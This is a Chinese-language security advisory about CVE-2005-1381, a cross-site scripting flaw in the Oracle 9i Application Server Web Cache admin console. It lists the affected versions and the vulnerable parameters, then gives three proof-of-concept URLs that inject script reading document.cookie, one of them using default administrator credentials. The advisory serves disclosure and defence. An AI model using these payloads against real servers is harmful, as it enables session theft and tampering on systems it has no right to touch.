首页 -> 安全研究

安全研究

安全漏洞
Oracle Application Server 9i Webcache跨站脚本漏洞

发布日期:2005-04-29
更新日期:2005-04-29

受影响系统:
Oracle Oracle 9i Application Server Web Cache 9.0.3.1
Oracle Oracle 9i Application Server Web Cache 9.0.2.3
Oracle Oracle 9i Application Server Web Cache 9.0.2.2
Oracle Oracle 9i Application Server Web Cache 2.0.0.4
Oracle Oracle 9i Application Server Web Cache 2.0.0.3
Oracle Oracle 9i Application Server Web Cache 2.0.0.2NT
Oracle Oracle 9i Application Server Web Cache 2.0.0.2
Oracle Oracle 9i Application Server Web Cache 2.0.0.1
Oracle Oracle 9i Application Server Web Cache 2.0.0.0
描述:
BUGTRAQ  ID: 13422,13422
CVE(CAN) ID: CVE-2005-1381

Oracle应用服务器是一个综合解决方案,用于开发、集成和部署企业的应用系统、门户和网站。

Oracle Application Server 9i Webcache管理控制台中存在跨站脚本漏洞,起因是应用程序在动态生成的WEB内容中包含用户提供输入之前没有正确的过滤这些输入。漏洞影响webcacheadmin脚本的PartialPageErrorPage参数和cache_dump_file参数。远程攻击者可以利用这些漏洞破坏Oracle Application Server安装。

<*来源:Alexander Kornbrust (ak@red-database-security.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111472423409560&w=2
        http://www.red-database-security.com/advisory/oracle_webcache_CSS_vulnerabilities.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_replace_file.txt<script>alert(document.cookie);</script>

http://server01:4000/webcacheadmin?SCREEN_ID=CGA.Site.ApologyPages_Edit&ACTION=Submit&PartialPageErrorPage=/inservice.html<script>alert(document.cookie)</script>&site_id=2

http://administrator:administrator@server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_append_file.txt<script>alert(document.cookie);</script>

建议:
厂商补丁:

Oracle
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.oracle.com/ip/deploy/ias/

浏览次数:4059
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障